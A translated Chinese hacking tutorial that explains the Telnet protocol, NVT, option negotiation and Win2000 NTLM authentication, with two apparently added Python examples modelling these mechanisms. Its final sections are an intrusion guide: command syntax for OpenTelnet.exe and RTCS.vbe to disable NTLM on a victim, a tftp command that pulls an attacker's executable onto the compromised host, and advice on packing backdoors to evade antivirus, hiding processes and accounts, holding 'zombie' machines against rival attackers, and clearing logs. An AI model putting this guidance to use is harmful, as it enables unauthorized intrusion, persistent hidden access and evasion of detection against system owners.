Telnet White Paper

The Telnet application not only makes remote login possible; it also gives attackers one more way in and one more place to leave a backdoor. But while enjoying the convenience Telnet brings you, do you really know how it works?

2. Remote Logon

Although the Telnet service is itself a client/server service, what matters more is that it implements remote login (remote interactive computing) on top of the Telnet protocol, so let's first get to know remote login.

1. Basic concepts of Remote Login

First, what is a logon? A time-sharing system lets several users use one computer at the same time. To keep the system secure and make accounting easy, the system requires each user to have a separate account as a logon ID and assigns each user a password. Before using the system, the user must enter this ID and password; that process is called "logon".

Remote login is the process in which a user, by means of the telnet command, temporarily turns his own computer into an emulated terminal of the remote host. The emulated terminal is equivalent to a dumb machine: it only passes each character the user types to the host, and displays on the screen each piece of output the host sends back.

2. Origin and development of remote login

Suppose we first want to build a remote text-editing service. Implementing it requires a server that accepts file-editing requests and data, and a client that sends those requests. The client establishes a TCP connection from the local machine to the server (which of course requires the server to respond), then sends the entered information (the file edits) to the server and reads the server's output. That is a standard, common client/server service.

It seems that with client/server services every remote problem can be solved, but it is not that simple. If all we need is to edit files remotely, the service just proposed is fully adequate. But if our requirements go further, and we also want remote user management, remote data entry, remote system maintenance, and indeed every operation that can be performed on the remote host, then we would need a large number of dedicated server programs, one server process for every computing service. The problem that follows is that the remote machine would soon be overwhelmed by server processes and drown in a sea of them (leaving aside the most specialized remote machines).

Is there a solution? Of course: remote login solves all of this. We let the user establish a login session on the remote machine and then execute commands, exactly as with local operation, to obtain more general services. In this way every command available on the remote system can be used, and the system designer need not provide a multitude of dedicated server programs.

The outlook now seems bright: remote login should solve the problem. But remote login is not easy to implement. Whatever computer system a network is designed around, it expects you to log on only from the directly connected keyboard and display. To add remote login to such a computer you would have to modify the machine's operating system, which is extremely difficult and something we try to avoid. So we concentrate instead on building remote login server software, although that is also fairly hard. Why is it hard?

For example, the operating system assigns special meanings to certain keys: the local system interprets Ctrl+C as "terminate the currently running command process". Once remote login software is running, however, a Ctrl+C may never be forwarded to the remote machine; and if the client does forward Ctrl+C to the remote machine, the Ctrl+C may not terminate the local process either. Confusion can arise here, and this is only one of the difficulties.

Despite the technical difficulties, system programmers did manage to build remote login server software that works with most operating systems, and client application software to go with it. In general, the client software strips the local interpretation from every key but one and converts those local interpretations into remote ones, so that the user's interaction with the remote machine is just as if he were sitting in front of it, which avoids the confusion described above. The single exception is the key that returns the user to the local environment.

Designing the remote login server as application-level software has another requirement: the operating system must support pseudo terminals. We use the term pseudo terminal for an entry point into the operating system that lets a program such as the telnet server send characters into the operating system as if they had come from a local keyboard. Only on an operating system that provides this can the remote login server be written as application-level software (such as a telnet server). Otherwise, neither the local nor the remote system would recognize the information sent by the other side (each can only recognize what is typed at its own local keyboard), and remote login would fail.

Designing the remote login server as application-level software has a significant advantage: it is easier to modify and control the server than to embed code in the operating system. The price of this design, however, is lower efficiency (explained later).

3. The remote login process

To log in remotely with the Telnet protocol, the following conditions must be met: the local computer must have a client program that implements the Telnet protocol; the IP address or domain name of the remote host must be known; and the logon ID and password must be known.

The Telnet remote login service consists of the following four steps:

1) Establish a connection from the local host to the remote host. In this step a TCP connection is set up, for which the remote host's IP address or domain name must be known;

2) Transmit the user name and password entered at the local terminal, and every command or character entered afterwards, to the remote host in NVT (network virtual terminal) format. In this step IP datagrams are actually sent from the local host to the remote host;

3) Convert the NVT-format data output by the remote host into a format the local side accepts and send it back to the local terminal, including the command echo and the results of command execution;

4) Finally, the local terminal disconnects from the remote host. This step tears down the TCP connection.

The above covers only the most basic aspects of remote login; the complexity behind it, and the hardships of the programmers who built it, are hard to imagine. I wonder whether you, using telnet so comfortably, have ever thought about this!

3. Telnet protocol

We know that the telnet server is the most commonly used remote login server software. It is a typical client/server service that works over the Telnet protocol. So what is the Telnet protocol, and what features does it have?

1. Basic Content

The Telnet protocol is a member of the TCP/IP protocol family and the Internet's standard protocol for the remote login service. It lets the computer used by the local user act as a terminal of the remote host system. It provides three basic services:

1) Telnet defines a network virtual terminal that provides a standard interface to remote systems. Client programs need no detailed knowledge of the remote system; they only need to be written against the standard interface;

2) Telnet includes a mechanism that lets the client and server negotiate options, and it provides a set of standard options;

3) Telnet treats the two ends of the connection symmetrically. That is, Telnet does not require the client to take its input from a keyboard or to display its output on a screen.

2. Heterogeneous adaptation

To make Telnet interaction across different operating systems possible, one must understand the heterogeneity of computers and operating systems in detail. For example, on some operating systems each line of text must end with the ASCII carriage return control character (CR); on others an ASCII line feed (LF) is required; and still others need the two-character sequence carriage return-line feed (CR-LF). Likewise, most operating systems give the user a shortcut key to interrupt a program, but the key differs between systems (some use Ctrl+C, others use Escape). If this heterogeneity is ignored, characters or commands sent from the local side may be inaccurate or cause errors once transferred to and interpreted by the remote system. The Telnet protocol must therefore solve this problem.

To accommodate heterogeneous environments, the Telnet protocol defines how data and commands are represented for transmission over the Internet. This definition is called the network virtual terminal, or NVT. It is applied as follows:

For data being sent: the client software converts the keystrokes and command sequences from the user's terminal into NVT format and sends them to the server; the server software receives the data and commands and converts them from NVT format into the format the remote system requires;

For data being returned: the remote server converts its output into NVT format, and the local client converts the received NVT-format data into the local format.

If you are interested in the detailed definition of the NVT format, you can look up the relevant material.

3. Sending remote commands

We know that most operating systems provide shortcut keys for various control commands. When you type such a shortcut key at a local terminal, the local system executes the corresponding control command rather than treating the keystroke as input. So how does telnet transmit control commands to the remote side?

Telnet also uses the NVT to define how control functions are transmitted from client to server. The US-ASCII character set contains 95 printable characters and 33 control codes. When you type an ordinary character locally, the NVT transmits it with its original meaning. When you type a shortcut key (key combination), the NVT sends it across the network as a special ASCII character, which is converted into the corresponding control command once it reaches the remote machine. There are two main reasons for distinguishing ordinary ASCII characters from control commands:

1) The distinction gives Telnet greater flexibility: it can transmit every possible ASCII character and every control function between client and server;

2) The distinction lets the client signal control functions unambiguously, with no confusion between a control function and ordinary characters.

4. Data Flow

As mentioned above, designing Telnet as application-level software has one drawback: low efficiency. Why? Consider the data flow through telnet:

Data typed by the user at the local keyboard is passed by the operating system to the client program. The client program processes it and hands it back to the operating system, which transmits it across the network to the remote machine. The remote operating system delivers the received data to the server program, which processes it again and passes it back into the operating system through the pseudo terminal entry point. Finally the remote operating system delivers the data to the application the user is running. That is one complete input path; output travels from server to client along the same path in reverse.

Because the computer switches process context several times for every input and output, the overhead is considerable. Fortunately a user's typing rate is low, so this drawback is acceptable.

5. Force Command

Consider the following situation: suppose the local user runs a faulty command or program on the remote machine that loops endlessly and has stopped reading its input. The operating system's buffer may then fill up. Now the remote server can no longer write data into the pseudo terminal, and eventually stops reading from the TCP connection; the TCP connection's buffer fills in turn, blocking the flow of data into the connection. When this happens, the local user loses control of the remote machine.

To solve this, the Telnet protocol uses out-of-band signaling to force the server to read a control command. TCP provides an urgent-data mechanism for out-of-band signaling, so Telnet only needs to append a reserved octet called the data mark and then notify the server by sending a TCP segment with the urgent bit set. A segment carrying urgent data bypasses flow control and reaches the server directly. In response to the urgent signal, the server reads and discards all data until it finds the data mark; once it has seen the data mark, it returns to normal processing.

6. Option Negotiation

Because of the heterogeneity of the machines and operating systems at the two ends, Telnet cannot rigidly specify the detailed configuration of every Telnet connection; doing so would greatly harm its adaptability and heterogeneity. Telnet therefore uses an option negotiation mechanism to solve this problem.

The range of Telnet options is wide: some extend general functionality, others concern small details. For example, one option controls whether Telnet works in half-duplex or full-duplex mode (a broad matter); another lets the server on the remote machine determine the user's terminal type (a small detail).

The way Telnet options are negotiated is also interesting. It is symmetric for every option: either end may send a negotiation request, and either end may accept or reject it. Moreover, if one end tries to negotiate an option the other end does not know, the receiving end can simply refuse. As a result, newer and more complex versions of Telnet clients and servers can interoperate with older, simpler ones: if both client and server understand the new options the interaction is improved, and otherwise they run together in a less efficient but workable way. All of this is designed to improve adaptability to heterogeneity, and it shows how important that is to the application and development of Telnet.
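The three mechanisms just described (control functions carried as IAC sequences, the data-mark recovery of section 5, and symmetric option negotiation in which unknown options are refused) can be seen together in one small NVT stream parser. This is an added example, not code from the article; the command and option byte values are the standard ones from RFC 854, and the SUPPORTED table is an assumed configuration for this endpoint.

```python
# Telnet command bytes from RFC 854.
IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251
SB, SE, DM, IP = 250, 240, 242, 244
# Options this endpoint is willing to enable (an assumed configuration);
# any option not listed here is refused during negotiation.
SUPPORTED = {0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 24: "TERMINAL-TYPE"}


class TelnetParser:
    def __init__(self):
        self.state = "data"        # data | iac | opt | sb | sb_iac
        self.cmd = 0               # pending DO/DONT/WILL/WONT
        self.synching = False      # True between the urgent signal and the Data Mark
        self.data = bytearray()    # bytes handed to the application
        self.sb = bytearray()      # sub-negotiation bytes being collected
        self.replies, self.events = [], []            # bytes to send back; control functions seen
        self.local_on, self.remote_on = set(), set()  # options enabled on our side / peer's side

    def urgent(self):
        self.synching = True       # TCP delivered urgent data: drop input until a Data Mark

    def feed(self, chunk):
        for b in chunk:
            self._byte(b)

    def _deliver(self, b):
        if not self.synching:      # Synch mode throws ordinary data away
            self.data.append(b)

    def _byte(self, b):
        if self.state == "data":
            if b == IAC:
                self.state = "iac"
            else:
                self._deliver(b)
        elif self.state == "iac":
            if b == IAC:                        # IAC IAC is a literal 0xFF data byte
                self._deliver(IAC)
                self.state = "data"
            elif b in (DO, DONT, WILL, WONT):
                self.cmd, self.state = b, "opt"
            elif b == SB:
                self.sb, self.state = bytearray(), "sb"
            else:                               # a control function such as IP or DM
                self._command(b)
                self.state = "data"
        elif self.state == "opt":
            self._negotiate(self.cmd, b)
            self.state = "data"
        elif self.state == "sb":
            if b == IAC:
                self.state = "sb_iac"
            else:
                self.sb.append(b)
        elif self.state == "sb_iac":
            if b == IAC:                        # escaped 0xFF inside a sub-negotiation
                self.sb.append(IAC)
                self.state = "sb"
                return
            if b == SE:                         # IAC SE ends the sub-negotiation
                opt = self.sb[0] if self.sb else -1
                self.events.append(f"SB {opt} {bytes(self.sb[1:]).hex()}")
            self.state = "data"                 # anything else is malformed: drop it

    def _command(self, b):
        # Control functions are interpreted even while synching; only data is dropped.
        if b == DM:
            self.synching = False
            self.events.append("DM")
        else:
            self.events.append("IP" if b == IP else f"CMD {b}")

    def _negotiate(self, cmd, opt):
        # Symmetric rules (RFC 1143): reply only when our state actually changes,
        # so two endpoints can never loop forever acknowledging each other.
        ours = cmd in (DO, DONT)                 # DO/DONT concern our side
        enabled = self.local_on if ours else self.remote_on
        accept, refuse = (WILL, WONT) if ours else (DO, DONT)
        if cmd in (DO, WILL):                    # peer wants the option switched on
            if opt not in SUPPORTED:
                self.replies.append(bytes([IAC, refuse, opt]))
            elif opt not in enabled:
                enabled.add(opt)
                self.replies.append(bytes([IAC, accept, opt]))
        elif opt in enabled:                     # DONT/WONT: switch it off
            enabled.discard(opt)
            self.replies.append(bytes([IAC, refuse, opt]))
```

Feed the parser the bytes read from the socket and call urgent() when the socket reports urgent data; replies holds the negotiation bytes to write back, and data holds what the application should see.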

Some principles have been discussed above. Although we rarely touch this layer while using Telnet, I think understanding it makes sense and will give us plenty of inspiration. Let's now look at the Win2000 Telnet service.

(This series of tutorials is updated occasionally; for the latest version, please visit the official website: caicainiao club)

4. Win2000 Telnet Service

In fact, from the application-layer point of view there is not much to say about the Win2000 Telnet service; most of it can be found in the help file. I only want to sort it out.

1. Basic Configuration

Win2000 ships with both a Telnet client and a Telnet server program.

The Telnet service is installed by default in Windows 2000 but is not started by default. According to the Help file, its default settings are as follows:

AllowTrustedDomain: whether domain users may access the service. The default is 1, allowing access by trusted domain users; it can be changed to 0, which denies access by domain users (only local users are allowed).

DefaultDomain: any domain that has a trust relationship with this computer. The default is ".".

DefaultShell: the path of the installed shell. The default is %SystemRoot%\system32\cmd.exe /Q /K.

MaxFailedLogins: the maximum number of failed logon attempts before the connection is closed. The default is 3.

LoginScript: the path of the logon script on the Telnet server. The default location is "%SystemRoot%\system32\login.cmd". You can edit the script to change the welcome screen shown at Telnet logon.

NTLM: the NTLM authentication option. The default is 2. The possible values are:

0: NTLM authentication is not used.

1: Try NTLM authentication first; if it fails, use a user name and password.

2: Only NTLM authentication is used.

TelnetPort: the port on which the Telnet server listens for Telnet requests. The default is 23; it can be changed to another port.

The tlntadmn.exe program (Telnet Server Administration) provides convenient configuration. After changing the configuration, you need to restart the Telnet service.


When it comes to telnet we cannot avoid mentioning NTLM. I think it is one of the biggest headaches for intruders: even if you have obtained the Administrator account and password, using them is not simple, and what is more, Telnet in Win2000 by default only authenticates in NTLM mode, which forces us to pay attention to NTLM. So what is NTLM?

The early SMB protocol transmitted passwords in cleartext over the network. Later came the "LAN Manager challenge/response" authentication mechanism, LM for short, which is very simple and easy to crack; Microsoft then proposed the Windows NT challenge/response mechanism, that is, NTLM. Today there are the newer NTLMv2 and Kerberos authentication systems. The NTLM workflow is as follows:

1. The client first hashes the current user's password locally into a password hash.

2. The client sends the account name to the server. The account name is not encrypted; it is transmitted in plaintext.

3. The server generates a 16-bit random number and sends it to the client as the challenge.

4. The client encrypts the challenge with the password hash and returns the result to the server as the response.

5. The server sends the user name, the challenge it sent to the client, and the response returned by the client to the domain controller.

6. The domain controller looks up the user's password hash in the SAM password database by user name, and encrypts the challenge with that hash.

7. The domain controller compares the two encrypted challenges; if they match, authentication succeeds.

From this process we can see that NTLM sends the login request to the Telnet server as the current user, not with the remote administrator's account and password that you scanned, so your logon will obviously fail. For example: your machine is named A (the local machine), the machine you are breaking into is named B (the remote machine), your account on A is xinxin with password 1234, and the Administrator account you scanned on B is administrator with password 5678. When you telnet to B, NTLM automatically uses the current user's account and password as the logon credentials for the seven steps above, that is, xinxin and 1234, rather than the administrator and 5678 you scanned. All of this happens automatically without giving you any chance to intervene, so your logon fails.
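The seven-step flow and the xinxin/administrator scenario above, modelled in Python as an added example (not code from the article or from Microsoft): client, Telnet server and domain controller exchange the messages in the order described, and the client always presents the locally logged-on user's credentials. Real NTLM uses MD4 and DES; SHA-256 and HMAC-SHA256 are substituted here, labelled in the code, so that the message sequence and the comparison at the domain controller can be run anywhere.

```python
import hashlib
import hmac
import os

# Stand-ins, labelled as such: real NTLM hashes the UTF-16LE password with MD4 and
# builds the NTLMv1 response by DES-encrypting the challenge under keys cut from
# that hash. SHA-256 and HMAC-SHA256 are substituted so this runs on any Python;
# the message sequence and the comparison at the domain controller are unchanged.
def password_hash(password: str) -> bytes:
    return hashlib.sha256(password.encode("utf-16-le")).digest()        # step 1


def compute_response(pw_hash: bytes, challenge: bytes) -> bytes:
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()         # steps 4 and 6


class DomainController:
    """Holds the account database (the article's SAM) and performs steps 6 and 7."""
    def __init__(self, accounts: dict):
        self.sam = {user.lower(): password_hash(pw) for user, pw in accounts.items()}

    def verify(self, username: str, challenge: bytes, response: bytes) -> bool:
        stored = self.sam.get(username.lower())
        if stored is None:                       # unknown account: fail closed
            return False
        expected = compute_response(stored, challenge)                   # step 6
        return hmac.compare_digest(expected, response)                   # step 7


class TelnetServer:
    """Issues the challenge (step 3) and forwards the triple to the DC (step 5)."""
    def __init__(self, dc: DomainController):
        self.dc = dc
        self.pending = {}          # username -> outstanding challenge
        self.wire = []             # what an observer on the network would see

    def begin(self, username: str) -> bytes:
        self.wire.append(("client->server username (plaintext)", username))  # step 2
        challenge = os.urandom(8)  # step 3; 8 bytes here (the article says 16-bit)
        self.pending[username] = challenge
        self.wire.append(("server->client challenge", challenge.hex()))
        return challenge

    def finish(self, username: str, response: bytes) -> bool:
        challenge = self.pending.pop(username, None)
        if challenge is None:                    # no outstanding challenge: reject
            return False
        self.wire.append(("client->server response", response.hex()))
        return self.dc.verify(username, challenge, response)             # steps 5 to 7


class TelnetClient:
    """Always presents the locally logged-on user's credentials, as the article says."""
    def __init__(self, current_user: str, current_password: str):
        self.user = current_user
        self.pw_hash = password_hash(current_password)                   # step 1

    def login(self, server: TelnetServer) -> bool:
        challenge = server.begin(self.user)                               # steps 2 and 3
        response = compute_response(self.pw_hash, challenge)              # step 4
        return server.finish(self.user, response)


def article_scenario():
    """Machine A's user xinxin/1234 telnets to B, where the scanned account is
    administrator/5678 (values from the article). Returns the outcomes for the
    current user, for the scanned account, for a wrong password, and the wire log."""
    dc_of_b = DomainController({"administrator": "5678"})
    server_b = TelnetServer(dc_of_b)
    as_current_user = TelnetClient("xinxin", "1234").login(server_b)       # fails
    as_scanned_admin = TelnetClient("administrator", "5678").login(server_b)
    wrong_password = TelnetClient("administrator", "guess").login(server_b)
    return as_current_user, as_scanned_admin, wrong_password, server_b.wire
```

The wire log shows what a network observer sees: the user name in plaintext, a fresh challenge, and a response that is only valid for that challenge, which is why a captured response cannot be replayed against a later one.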

Because the Telnet server has three options for NTLM use, when you telnet to a remote machine one of the following is displayed:

1) when the AUTHENTICATION option is 0


Microsoft (r) Windows (TM) Version 5.00 (build 2195)

Welcome to Microsoft Telnet Service

Telnet Server build 5.00.99201.1



// With the value 0, NTLM authentication is not used; you enter the user name and password directly, for example administrator and 5678.

2) When the AUTHENTICATION option is 1


NTLM authentication failed due to insufficient credentials. Please login withclear text username and password

Microsoft (r) Windows (TM) Version 5.00 (build 2195)

Welcome to Microsoft Telnet Service

Telnet Server build 5.00.99201.1



// NTLM authentication is tried first; if it fails, a user name and password are used. In practice this is no different from the previous case.

3) when the AUTHENTICATION option is 2


NTLM authentication failed due to insufficient credentials. Please login withclear text username and password

Server allows NTLM authentication only

Server has closed connection

The connection to the host is lost.


// Look closely at the display above: you get no chance to enter a user name and password; the server simply closes the connection, whatever password you scanned.

So for intruders NTLM is a mountain standing in the way that must be removed. The usual methods are the following:

1. Modify the Telnet server configuration through the remote registry, changing the authentication mode from 2 to 1 or 0;

2. Upload ntlm.exe and run it directly; it changes the Telnet server authentication mode from 2 to 1;

3. Create locally a user identical to the one you scanned, run the Telnet client as that user, and log in remotely;

4. Use software such as opentelnet.exe (requires Administrator rights and the IPC pipe enabled);

5. Use scripts such as RTCS (requires Administrator rights but not the IPC pipe).

These five methods are the ones basically in use; the last two are the most common for enabling telnet, and they are very simple. The commands are as follows:

OpenTelnet.exe \\Server Username Password NTLMAuthor TelnetPort

OpenTelnet.exe \\<server address> <administrator user name> <password> <authentication method: 0 or 1> <Telnet port>

cscript RTCS.vbe TargetIP Username Password NTLMAuthor TelnetPort

cscript RTCS.vbe <target IP address> <administrator user name> <password> <authentication method>

5. What to do after Telnet?

I thought that was the end, but many friends said they did not know what to do after getting in with Telnet. In that case let me introduce it. This time I will not discuss concrete practice, only ideas. What? Why not concrete practice? I will explain one by one later.

1. View System Information

Look at the system configuration and version (use type C:\boot.ini to tell Professional from Server), see what services or software are installed (the directory names tell you), look for important or interesting files (alas, on a foreign machine you may not understand them), and look at the user situation; in short, learn as much as possible about the system, in preparation for planting a backdoor later.

2. Use TFTP to transfer files

I think everyone has run into the problem of transferring files over Telnet. Because we are used to transferring files through the IPC pipe, some friends like to open the pipe with net share IPC$ and then use copy to transfer files, but that is troublesome. Now that we have a shell, we can do all this with the tftp command. So what is TFTP?

TFTP (Trivial File Transfer Protocol) is a file transfer protocol based on UDP. A complete transfer setup is usually built from tftp.exe and a TFTP server program. It is used like this: first run the TFTP server software locally (for example tftpd32.exe) and keep it running until the transfer completes, then in Telnet (or of course any other shell) run the following command:

C:\> tftp -i IP get xinxin.exe C:\ABC\xinxin.exe

In this example xinxin.exe is downloaded from the TFTP server into the ABC directory of drive C (that is, uploaded to the remote machine).

Note that if you are behind a proxy you will not be able to transfer files with the outside network, because the proxy gateway puts its own IP address, not your internal address, into the datagram when encapsulating it, so the external host cannot find the TFTP server when it tries to address it.

3. Backdoor placement

It may seem a bit early to place the backdoor as the second step. If you have other purposes, such as causing damage or modifying the home page, you can certainly do those before placing the backdoor; if you just want a zombie, there is nothing more to say, just install a backdoor.

There are many kinds of backdoor, which gives us plenty of choice, and choosing the right one for the situation is a skill in itself. Common backdoors include Trojans, ASP Trojans, remote control software, cloned accounts, created and hidden accounts, telnet, Telnet extended shells, and terminal services. When installing a good backdoor, pay attention to the following points:

1. Do not get scanned and blocked by the firewall: a backdoor that is already in the virus databases is best packed so it evades the firewall, and use a low port for communication to avoid being blocked by the firewall.

2. Maximize concealment: if you choose remote control software, pay attention to installation prompts and small icons on the controlled end, and whether the screen is synchronized; if you work with accounts, make sure there are no flaws in cmd and user management; if you choose to plant a Trojan or Telnet extension, be sure to hide the files and processes; if terminal services are newly opened (not opened before the intrusion), you must move it off the conspicuous port 3389, and the lower the port the better.

3. Do not assume the Administrator does not exist: this is a big taboo. Many friends create an administrator account named something like "hacking" on a machine that has only default accounts. That is truly fearless. So when placing backdoors, think about where the Administrator is likely to be negligent.

4. Patch

If you want to keep control of bots you need to patch them; you should know that the competition for bots is fierce. How to install patches? What to patch? Think about how you got in. Besides fixing the major vulnerabilities (upload and run the official patches), also attend to shares, IPC$ sharing (preferably close them all), suspicious ports, and services that are easy to exploit. But be careful about concealment while patching: do not let the Administrator notice major changes.

5. Clear logs

You can do it manually or with software; if you are not familiar with the software, consult the relevant tutorials. I will not go into detail here.
